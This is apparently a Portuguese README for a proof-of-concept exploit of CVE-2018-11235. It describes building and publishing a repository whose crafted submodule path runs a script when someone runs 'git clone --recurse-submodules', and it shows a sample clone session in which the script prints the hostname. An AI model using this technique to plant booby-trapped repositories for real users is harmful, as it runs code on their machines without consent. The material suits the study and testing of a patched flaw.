
Exploit PoC para CVE-2018-11235 que permite RCE em git clone --recurse-submodules
O GitHub não está permitindo que eu envie um repositório explorando a vulnerabilidade (ponto positivo para eles), então você terá que construí-lo executando o script build.sh.
Em seguida, envie o repositório para algum lugar. Quando você o clonar com a flag --recurse-submodules, o script malicioso é executado:
$ git clone --recurse-submodules repo dest_dir
Cloning into 'dest_dir'...
done.
Submodule 'Spoon-Knife' (https://github.com/octocat/Spoon-Knife) registered for path 'Spoon-Knife'
Submodule '../../modules/evil' (https://github.com/octocat/Spoon-Knife) registered for path 'evil'
Cloning into '/snip/dest_dir/Spoon-Knife'...
Submodule path 'Spoon-Knife': checked out 'd0dd1f61b33d64e29d8bc1372a94ef6a2fee76a9'
Here is your hostname: snip
Submodule path 'evil': checked out 'd0dd1f61b33d64e29d8bc1372a94ef6a2fee76a9'
Código derivado do git patch do @peff (procure pelo arquivo de teste t/t7415-submodule-names.sh).
Como tal, este repositório é publicado sob a GNU General Public License versão 2.
Correção adicional para versões mais antigas do git cortesia de @atorralba (detalhes neste post).